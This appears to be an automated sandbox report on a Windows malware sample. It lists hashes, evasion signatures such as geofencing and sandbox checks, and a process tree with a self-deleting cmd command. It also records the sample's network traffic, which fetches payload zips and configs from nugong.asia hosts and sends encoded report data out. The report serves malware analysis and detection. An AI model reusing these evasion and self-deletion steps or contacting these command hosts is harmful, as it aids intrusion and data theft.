Analysis

  • max time kernel
    151s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12/10/2023, 17:03 UTC

General

  • Target

    bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe

  • Size

    399KB

  • MD5

    6b536c7f28c331c46c88e5e1827f83d0

  • SHA1

    c55b37d2fcbe8c5178f065b7fb08395aafd68dc9

  • SHA256

    bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb

  • SHA512

    7e22107cb788c71459510aef25a2123c058855e03c7c4ea6530f457246b7d84aad965b8cce90ed305d94f66ca8e9699d26e80b03572b13e710738dc77112d5e0

  • SSDEEP

    6144:XKiYJL+K7EQ5vrt5AVfL8haEK4sDzLPFZcEOkCybEaQRXr9HNdvOa:LqEU0Vf4ha0sDzDOkx2LIa

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Drops file in System32 directory 16 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 31 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:584
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe
        "C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe"
        2⤵
        • Checks computer location settings
        • Drops file in System32 directory
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2196
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\bc082e85f4f4ea47b3a27d31690c78bdffec1444a5d548b12442f8d73bf524eb.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 1
            4⤵
            • Delays execution with timeout.exe
            PID:708
      • C:\Program Files\rdpsign.exe
        "C:\Program Files\rdpsign.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Checks SCSI registry key(s)
        • Modifies Control Panel
        • Suspicious use of AdjustPrivilegeToken
        PID:548
    • C:\Windows\Syswow64\b9de8270
      C:\Windows\Syswow64\b9de8270
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Windows\Syswow64\b9de8270"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4604
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 1
          3⤵
          • Delays execution with timeout.exe
          PID:2468

    Network

    • flag-us
      DNS
      down.nugong.asia
      b9de8270
      Remote address:
      114.114.114.114:53
      Request
      down.nugong.asia
      IN A
      Response
      down.nugong.asia
      IN CNAME
      down.nugong.asia.cdn.dnsv1.com.cn
      down.nugong.asia.cdn.dnsv1.com.cn
      IN CNAME
      ofgk41rd.slt.sched.tdnsv8.com
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      ofgk41rd.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
    • flag-us
      DNS
      158.240.127.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      158.240.127.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      254.105.26.67.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      254.105.26.67.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip
      b9de8270
      Remote address:
      122.189.171.111:443
      Request
      GET /pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 06:20:12 GMT
      Etag: "9622e382ef8f51e5dc3cfdeaacf2f928"
      Content-Type: application/zip
      Date: Mon, 11 Sep 2023 19:04:34 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 4589936052107238770
      x-cos-request-id: NjRmZjY0YzJfNmNkMTc2MWVfMzQ3M18xNTQ3MjVi
      Content-Length: 462740
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 18237741092755376616
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      114.114.114.114.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.114.114.114.in-addr.arpa
      IN PTR
      Response
      114.114.114.114.in-addr.arpa
      IN PTR
      public1.114dns.com
    • flag-us
      DNS
      111.171.189.122.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      111.171.189.122.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      140.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      140.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      108.211.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      108.211.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Mon, 11 Sep 2023 18:02:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRmZjU2MzdfNTc5NjdmMGJfMzFjMV9hOTZiMTA=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 4203355729219439325
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/ping.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/ping.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Wed, 02 Nov 2022 09:53:56 GMT
      Etag: "bdf198e2733b39eae21f211114395f67"
      Content-Type: text/plain
      Date: Mon, 11 Sep 2023 18:02:31 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3269775211629437622
      x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
      x-cos-request-id: NjRmZjU2MzdfNTc5NjdmMGJfMzFjMV9hOTZiMTA=
      Content-Length: 16
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 3481312161968609272
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userchange.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/userchange.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 09:19:13 GMT
      Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 09:22:22 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 12006462995938776668
      x-cos-request-id: NjUyNTE3Y2VfOTZhMjA4MDlfMTVjMl80NzM3Y2Rk
      Content-Length: 80
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10905350539667753015
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/userpq.zip
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/userpq.zip HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Sun, 15 Oct 2023 12:14:07 GMT
      Etag: "adc490d0b07f1be911590c5b795aebea"
      Content-Type: application/zip
      Date: Sun, 15 Oct 2023 12:17:13 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2623325120400499928
      x-cos-request-id: NjUyYmQ4NDlfYTBhZmFmMDlfMmE5NF8xNTFmYzZm
      Content-Length: 14048
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 4408665578442023211
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/blacklist.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/blacklist.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 10 Oct 2023 08:12:24 GMT
      Etag: "0df08590c5e267537d4ea37bf856ff07"
      Content-Type: text/plain
      Date: Tue, 10 Oct 2023 08:15:33 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 2970137862095809835
      x-cos-request-id: NjUyNTA4MjVfMTI3NmIyMDlfOWU1MV8zNjliMmVj
      Content-Length: 13312
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 16786581235747152934
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 06:20:14 GMT
      Etag: "9d521f6ead300ca3ecac2f59c201b009"
      Content-Type: application/json
      Date: Mon, 11 Sep 2023 19:04:36 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11522679188396684273
      x-cos-request-id: NjRmZjY0YzRfYzQzNjY4MDlfNzU2MF9iNDQ2YmM=
      Content-Length: 2176
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 12998831159411314338
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ms.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/pub/ms.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 17 Oct 2023 06:21:00 GMT
      Etag: "08d385dd32607b44989f5f7d93cfb1a4"
      Content-Type: application/json
      Date: Tue, 17 Oct 2023 06:24:06 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5642918650456635813
      x-cos-request-id: NjUyZTI4ODZfMjhjZDExMGJfMjgzZGNfNDNlMzIxNg==
      Content-Length: 70816
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 9661404336593585327
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/cfg/pub/ps.json
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/pub/ps.json HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Tue, 17 Oct 2023 06:21:00 GMT
      Etag: "38f11ea8d0226630fb9251be3a7b1e4b"
      Content-Type: application/json
      Date: Tue, 17 Oct 2023 06:24:05 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 5867845126828716719
      x-cos-request-id: NjUyZTI4ODRfZDFiNWFmMDlfZWFlYV80MjQ1NTgw
      Content-Length: 14496
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 263157557074778901
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://down.nugong.asia/pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip HTTP/1.1
      Host: down.nugong.asia
      User-Agent: CHM_MSDN
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 25 Aug 2023 03:44:04 GMT
      Etag: "98b2cfa00e1b12ee10d1c93ef1d3dedc"
      Content-Type: application/zip
      Date: Mon, 09 Oct 2023 22:18:32 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 3940288121217723607
      x-cos-request-id: NjUyNDdjMzhfNTBiMzAzMDlfMTY3Ml80NmExZWQx
      Content-Length: 330316
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 10491646738914027669
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-cn
      GET
      http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /report/report_data?data=… HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:27 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 15260473372039476250
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://mprrpt.nugong.asia/report.php?data=…
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /report.php?data=… HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:26 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 16181278050411485289
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • flag-cn
      GET
      http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt
      rdpsign.exe
      Remote address:
      122.189.171.111:80
      Request
      GET /cfg/cmc/zbcfg_exe.txt HTTP/1.1
      Host: down.nugong.asia
      Response
      HTTP/1.1 200 OK
      Last-Modified: Mon, 16 Oct 2023 16:25:58 GMT
      Etag: "964b0b85a18cfe842b0ccfbf6900209a"
      Content-Type: text/plain
      Date: Mon, 16 Oct 2023 16:34:14 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 11792530854517344045
      x-cos-request-id: NjUyZDY2MDZfNmRlZjk4MWVfMTZmYjBfNDM4NGU5NQ==
      Content-Length: 1376
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 5318320631035226075
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      apps.game.qq.com
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      apps.game.qq.com
      IN A
      Response
      apps.game.qq.com
      IN A
      101.227.134.27
      apps.game.qq.com
      IN A
      101.227.134.49
    • flag-cn
      GET
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      rdpsign.exe
      Remote address:
      101.227.134.27:443
      Request
      GET /comm-htdocs/ip/get_ip.php HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: apps.game.qq.com
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Date: Tue, 17 Oct 2023 07:38:20 GMT
      Content-Type: text/html
      Content-Length: 49
      Connection: close
      Server: swoole-http-server
      Content-Encoding: gzip
    • flag-us
      DNS
      ocsp.digicert.cn
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.cn
      IN A
      Response
      ocsp.digicert.cn
      IN CNAME
      ocsp.digicert.cn.w.cdngslb.com
      ocsp.digicert.cn.w.cdngslb.com
      IN A
      47.246.48.205
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D
      rdpsign.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Tue, 17 Oct 2023 06:39:23 GMT
      Ali-Swift-Global-Savetime: 1697524763
      Via: cache2.l2de2[51,50,200-0,M], cache1.l2de2[52,0], cache1.l2de2[53,0], cache5.nl2[0,-1,200-0,H], cache4.nl2[22,0]
      Age: 3536
      X-Cache: HIT TCP_MEM_HIT dirn:1:61464607
      X-Swift-SaveTime: Tue, 17 Oct 2023 06:39:23 GMT
      X-Swift-CacheTime: 3600
      Timing-Allow-Origin: *
      EagleId: 2ff6309816975282998335874e
    • flag-nl
      GET
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      rdpsign.exe
      Remote address:
      47.246.48.205:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.digicert.cn
      Response
      HTTP/1.1 200 OK
      Server: Tengine
      Content-Type: application/ocsp-response
      Content-Length: 471
      Connection: keep-alive
      Cache-Control: max-age=7200
      Date: Tue, 17 Oct 2023 06:49:55 GMT
      Ali-Swift-Global-Savetime: 1697525395
      Via: cache5.l2de2[0,0,200-0,H], cache7.l2de2[1,0], cache8.nl2[0,0,200-0,H], cache4.nl2[1,0]
      Age: 2904
      X-Cache: HIT TCP_MEM_HIT dirn:11:365779980
      X-Swift-SaveTime: Tue, 17 Oct 2023 07:23:36 GMT
      X-Swift-CacheTime: 1579
      Timing-Allow-Origin: *
      EagleId: 2ff6309816975282999326168e
    • flag-us
      DNS
      27.134.227.101.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      27.134.227.101.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      205.48.246.47.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      205.48.246.47.in-addr.arpa
      IN PTR
      Response
    • flag-cn
      GET
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4
      b9de8270
      Remote address:
      122.189.171.111:443
      Request
      GET /report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4 HTTP/1.1
      Accept-Encoding: gzip, deflate
      Host: nreprot.nugong.asia
      Connection: Close
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 7379929138276653248
      Connection: close
      X-Cache-Lookup: Cache Miss
    • flag-us
      DNS
      sp1.baidu.com
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      sp1.baidu.com
      IN A
      Response
      sp1.baidu.com
      IN CNAME
      www.a.shifen.com
      www.a.shifen.com
      IN CNAME
      www.wshifen.com
      www.wshifen.com
      IN A
      104.193.88.77
      www.wshifen.com
      IN A
      104.193.88.123
    • flag-us
      DNS
      101.14.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.14.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      ocsp.trust-provider.cn
      b9de8270
      Remote address:
      8.8.8.8:53
      Request
      ocsp.trust-provider.cn
      IN A
      Response
      ocsp.trust-provider.cn
      IN CNAME
      ocsp.trust-provider.cn.c.vedcdnlb.com
      ocsp.trust-provider.cn.c.vedcdnlb.com
      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.13.153.152
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.48.138.18
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.206.23.199
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      112.50.95.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      117.27.246.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      119.36.90.164
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.143.236.7
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.248.38.100
    • flag-us
      GET
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      rdpsign.exe
      Remote address:
      104.193.88.77:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Expires: Tue, 17 Oct 2023 07:38:22 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=5D16934795C09A11CC095B3B33C6B15A:FG=1; expires=Wed, 16-Oct-24 07:38:22 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Set-Cookie: BAIDUID=A4FC91B6CB4CAE79F0E67D013DC81899:FG=1; expires=Wed, 16-Oct-24 07:38:22 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 23024345590415660810101715
      Tracecode: 23024341420407075594101715
      X-Powered-By: HHVM
    • flag-cn
      GET
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      b9de8270
      Remote address:
      111.13.153.152:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Age: 1
      CF-Cache-Status: HIT
      CF-RAY: 816301a1de422544-SJC
      ETag: "45ca5445b1ecdd148809b4c7123fe87594c33cb1"
      Expires: Sat, 21 Oct 2023 21:19:06 GMT
      Last-Modified: Sat, 14 Oct 2023 21:19:07 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb2
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PSbjyd4dq13:7 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 652e2f4b_PSbjyd4hh12_39853-31280
      cache-via: cache.n173-159-130.bdcdn-bjcm
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 1697528302b17e28311cc3ea8e2357e705230bdac7
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n173-159-130.bdcdn-bjcm(HIT)
      X-Bdsa-Cache-Tm: 1697525579-877
      Accept-Ranges: bytes
      via: n173-159-129.bdcdn-bjcm.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
